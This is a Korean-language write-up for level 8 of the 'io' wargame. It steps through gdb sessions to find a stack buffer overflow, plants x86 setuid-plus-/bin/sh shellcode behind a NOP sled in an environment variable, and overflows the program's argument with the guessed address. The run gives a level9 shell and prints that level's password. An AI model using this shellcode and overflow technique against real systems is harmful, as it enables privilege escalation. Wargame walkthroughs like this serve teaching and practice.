Level 8 문제 소스는 아래와 같다.
우선 gdb를 이용하여 디버깅을 해보도록 하자.
level8@io:/tmp/by8$ gdb /levels/level08
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) disassemble main
Dump of assembler code for function main:
0x08048400 <main+0>: lea 0x4(%esp),%ecx
0x08048404 <main+4>: and $0xfffffff0,%esp
0x08048407 <main+7>: pushl -0x4(%ecx)
0x0804840a <main+10>: push %ebp
0x0804840b <main+11>: mov %esp,%ebp
0x0804840d <main+13>: push %ecx
0x0804840e <main+14>: sub $0x4,%esp
0x08048411 <main+17>: mov 0x4(%ecx),%eax
0x08048414 <main+20>: mov %eax,(%esp)
0x08048417 <main+23>: call 0x8048394 <do_the_nasty>
0x0804841c <main+28>: mov $0x0,%eax
0x08048421 <main+33>: add $0x4,%esp
0x08048424 <main+36>: pop %ecx
0x08048425 <main+37>: pop %ebp
0x08048426 <main+38>: lea -0x4(%ecx),%esp
0x08048429 <main+41>: ret
End of assembler dump.
(gdb) b do_the_nasty
Breakpoint 1 at 0x8048398
(gdb) r `python -c "print 'A'*32 + ' ' + 'B'*10"`
Starting program: /levels/level08 `python -c "print 'A'*32 + ' ' + 'B'*10"`
Breakpoint 1, 0x08048398 in do_the_nasty ()
(gdb) n
Single stepping until exit from function do_the_nasty,
which has no line number information.
0x0804841c in main ()
(gdb) x/32wx $esp
0xbfffdc70: 0xbfffdd14 0xbfffdc90 0xbfffdce8 0x42536455
0xbfffdc80: 0x42424242 0x42424242 0xbfff0042 0x00536455
0xbfffdc90: 0x00000003 0xbfffdd14 0xbfffdd24 0x006e4b18
0xbfffdca0: 0x00000001 0x00000001 0x00000000 0x0804820d
0xbfffdcb0: 0x00659ff4 0x08048480 0x080482f0 0xbfffdce8
0xbfffdcc0: 0xebb92081 0xb2c835fe 0x00000000 0x00000000
0xbfffdcd0: 0x00000000 0x00da02e0 0x0053637d 0x00da7ff4
0xbfffdce0: 0x00000003 0x080482f0 0x00000000 0x08048311
(gdb) x/32wx $esp-50
0xbfffdc3e: 0xdc440000 0x4141bfff 0x41414141 0x41414141
0xbfffdc4e: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdc5e: 0x41414141 0x82f04141 0xdc780804 0x841cbfff
0xbfffdc6e: 0xdd140804 0xdc90bfff 0xdce8bfff 0x6455bfff
0xbfffdc7e: 0x42424253 0x42424242 0x00424242 0x6455bfff
0xbfffdc8e: 0x00030053 0xdd140000 0xdd24bfff 0x4b18bfff
0xbfffdc9e: 0x0001006e 0x00010000 0x00000000 0x820d0000
0xbfffdcae: 0x9ff40804 0x84800065 0x82f00804 0xdce80804
(gdb) x/32wx $esp-48
0xbfffdc40: 0xbfffdc44 0x41414141 0x41414141 0x41414141
0xbfffdc50: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdc60: 0x41414141 0x080482f0 0xbfffdc78 0x0804841c
0xbfffdc70: 0xbfffdd14 0xbfffdc90 0xbfffdce8 0x42536455
0xbfffdc80: 0x42424242 0x42424242 0xbfff0042 0x00536455
0xbfffdc90: 0x00000003 0xbfffdd14 0xbfffdd24 0x006e4b18
0xbfffdca0: 0x00000001 0x00000001 0x00000000 0x0804820d
0xbfffdcb0: 0x00659ff4 0x08048480 0x080482f0 0xbfffdce8
(gdb) x/32wx 0xbfffdc78
0xbfffdc78: 0xbfffdce8 0x42536455 0x42424242 0x42424242
0xbfffdc88: 0xbfff0042 0x00536455 0x00000003 0xbfffdd14
0xbfffdc98: 0xbfffdd24 0x006e4b18 0x00000001 0x00000001
0xbfffdca8: 0x00000000 0x0804820d 0x00659ff4 0x08048480
0xbfffdcb8: 0x080482f0 0xbfffdce8 0xebb92081 0xb2c835fe
0xbfffdcc8: 0x00000000 0x00000000 0x00000000 0x00da02e0
0xbfffdcd8: 0x0053637d 0x00da7ff4 0x00000003 0x080482f0
0xbfffdce8: 0x00000000 0x08048311 0x08048400 0x00000003
(gdb) x/32wx 0xbfffdce8
0xbfffdce8: 0x00000000 0x08048311 0x08048400 0x00000003
0xbfffdcf8: 0xbfffdd14 0x08048480 0x08048430 0x00d9b250
0xbfffdd08: 0xbfffdd0c 0x00da5ae5 0x00000003 0xbfffddf7
0xbfffdd18: 0xbfffde07 0xbfffde28 0x00000000 0xbfffde33
0xbfffdd28: 0xbfffdec0 0xbfffded0 0xbfffdedb 0xbfffdefd
0xbfffdd38: 0xbfffdf10 0xbfffdf1c 0xbfffdf28 0xbfffdf55
0xbfffdd48: 0xbfffdf6b 0xbfffdf7a 0xbfffdf87 0xbfffdf90
0xbfffdd58: 0xbfffdfa2 0xbfffdfaa 0xbfffdfb9 0x00000000
(gdb) q
The program is running. Exit anyway? (y or n) y
level8@io:/tmp/by8$
위에서 보면 argv[2]에 좀 더 값을 주면 흐름을 바꿀 수 있을 것으로 보인다. 다시 한번 해보도록 하자.
level8@io:/tmp/by8$ gdb /levels/level08
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) disassemble main
Dump of assembler code for function main:
0x08048400 <main+0>: lea 0x4(%esp),%ecx
0x08048404 <main+4>: and $0xfffffff0,%esp
0x08048407 <main+7>: pushl -0x4(%ecx)
0x0804840a <main+10>: push %ebp
0x0804840b <main+11>: mov %esp,%ebp
0x0804840d <main+13>: push %ecx
0x0804840e <main+14>: sub $0x4,%esp
0x08048411 <main+17>: mov 0x4(%ecx),%eax
0x08048414 <main+20>: mov %eax,(%esp)
0x08048417 <main+23>: call 0x8048394 <do_the_nasty>
0x0804841c <main+28>: mov $0x0,%eax
0x08048421 <main+33>: add $0x4,%esp
0x08048424 <main+36>: pop %ecx
0x08048425 <main+37>: pop %ebp
0x08048426 <main+38>: lea -0x4(%ecx),%esp
0x08048429 <main+41>: ret
End of assembler dump.
(gdb) b do_the_nasty
Breakpoint 1 at 0x8048398
(gdb) r `python -c "print 'A'*32 + ' ' + 'B'*200"`
Starting program: /levels/level08 `python -c "print 'A'*32 + ' ' + 'B'*200"`
Breakpoint 1, 0x08048398 in do_the_nasty ()
(gdb) n
Single stepping until exit from function do_the_nasty,
which has no line number information.
0x0804841c in main ()
(gdb) x/32wx $esp
0xbfffdbb0: 0xbfffdc54 0xbfffdbd0 0xbfffdc28 0x423e0455
0xbfffdbc0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbd0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbe0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbf0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc00: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc10: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc20: 0x42424242 0x42424242 0x42424242 0x42424242
(gdb) x/32wx $esp-50
0xbfffdb7e: 0xdb840000 0x4141bfff 0x41414141 0x41414141
0xbfffdb8e: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdb9e: 0x41414141 0x82f04141 0xdbb80804 0x841cbfff
0xbfffdbae: 0xdc540804 0xdbd0bfff 0xdc28bfff 0x0455bfff
0xbfffdbbe: 0x4242423e 0x42424242 0x42424242 0x42424242
0xbfffdbce: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbde: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbee: 0x42424242 0x42424242 0x42424242 0x42424242
(gdb) x/32wx $esp-48
0xbfffdb80: 0xbfffdb84 0x41414141 0x41414141 0x41414141
0xbfffdb90: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdba0: 0x41414141 0x080482f0 0xbfffdbb8 0x0804841c
0xbfffdbb0: 0xbfffdc54 0xbfffdbd0 0xbfffdc28 0x423e0455
0xbfffdbc0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbd0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbe0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbf0: 0x42424242 0x42424242 0x42424242 0x42424242
(gdb) x/32wx 0xbfffdbb8
0xbfffdbb8: 0xbfffdc28 0x423e0455 0x42424242 0x42424242
0xbfffdbc8: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbd8: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbe8: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbf8: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc08: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc18: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc28: 0x42424242 0x42424242 0x42424242 0x42424242
(gdb) x/32wx 0xbfffdc28
0xbfffdc28: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc38: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc48: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc58: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc68: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc78: 0x42424242 0x42424242 0x42424242 0x00424242
0xbfffdc88: 0xbfffdf6b 0xbfffdf7a 0xbfffdf87 0xbfffdf90
0xbfffdc98: 0xbfffdfa2 0xbfffdfaa 0xbfffdfb9 0x00000000
(gdb)
원하는대로 흐름이 넘어온 것을 확인할 수 있었다. 따라서 [A32] + [SHELLCODE의 주소 200] 으로 공격을 시도해 보도록 하자.
level8@io:/tmp/by8$ export SHELLCODE=`python -c "print '\x90'*100 + '\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80'"`
level8@io:/tmp/by8$ gdb /levels/level08
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) b main
Breakpoint 1 at 0x804840e
(gdb) r
Starting program: /levels/level08
Breakpoint 1, 0x0804840e in main ()
(gdb) x/32wx $esp
0xbfffdca4: 0xbfffdcc0 0xbfffdd18 0x00126455 0x08048480
0xbfffdcb4: 0x080482f0 0xbfffdd18 0x00126455 0x00000001
0xbfffdcc4: 0xbfffdd44 0xbfffdd4c 0x005c7b18 0x00000001
0xbfffdcd4: 0x00000001 0x00000000 0x0804820d 0x00249ff4
0xbfffdce4: 0x08048480 0x080482f0 0xbfffdd18 0xebb98081
0xbfffdcf4: 0x30c835fe 0x00000000 0x00000000 0x00000000
0xbfffdd04: 0x00d0d2e0 0x0012637d 0x00d14ff4 0x00000001
0xbfffdd14: 0x080482f0 0x00000000 0x08048311 0x08048400
(gdb)
0xbfffdd24: 0x00000001 0xbfffdd44 0x08048480 0x08048430
0xbfffdd34: 0x00d08250 0xbfffdd3c 0x00d12ae5 0x00000001
0xbfffdd44: 0xbfffde23 0x00000000 0xbfffde33 0xbfffdec0
0xbfffdd54: 0xbfffded0 0xbfffdedb 0xbfffdefd 0xbfffdf10
0xbfffdd64: 0xbfffdf1c 0xbfffdf28 0xbfffdf55 0xbfffdf6b
0xbfffdd74: 0xbfffdf7a 0xbfffdf87 0xbfffdf90 0xbfffdfa2
0xbfffdd84: 0xbfffdfaa 0xbfffdfb9 0x00000000 0x00000010
0xbfffdd94: 0xbfebfbff 0x00000006 0x00001000 0x00000011
(gdb)
0xbfffdda4: 0x00000064 0x00000003 0x08048034 0x00000004
0xbfffddb4: 0x00000020 0x00000005 0x00000007 0x00000007
0xbfffddc4: 0x00cfa000 0x00000008 0x00000000 0x00000009
0xbfffddd4: 0x080482f0 0x0000000b 0x000003f0 0x0000000c
0xbfffdde4: 0x000003f0 0x0000000d 0x000003f0 0x0000000e
0xbfffddf4: 0x000003f0 0x00000017 0x00000000 0x0000000f
0xbfffde04: 0xbfffde1b 0x00000000 0x00000000 0x00000000
0xbfffde14: 0x00000000 0x69000000 0x00363836 0x2f000000
(gdb)
0xbfffde24: 0x6576656c 0x6c2f736c 0x6c657665 0x53003830
0xbfffde34: 0x4c4c4548 0x45444f43 0x9090903d 0x90909090
0xbfffde44: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde54: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde64: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde74: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde84: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde94: 0x90909090 0x90909090 0x90909090 0x58176a90
(gdb) q
The program is running. Exit anyway? (y or n) y
level8@io:/tmp/by8$ /levels/level08 `python -c "print 'A'*32 + ' ' + '\x94\xde\xff\xbf'*200"`
Segmentation fault
level8@io:/tmp/by8$ /levels/level08 `python -c "print 'A'*32 + ' ' + '\xff\xbf\x94\xde'*200"`
Segmentation fault
level8@io:/tmp/by8$ /levels/level08 `python -c "print 'A'*32 + ' ' + '\xbf\x94\xde\xff'*200"`
sh-3.2$ id
uid=1008(level8) gid=1008(level8) euid=1009(level9) groups=1008(level8),1029(nosu)
sh-3.2$ cat /home/level9/.pass
ynfbxd6t
sh-3.2$
쉘코드를 환경변수에 입력하여 주소의 위치가 변경되어 조금씩 바꾸어 주다 보면 주소가 맞아 떨어진다...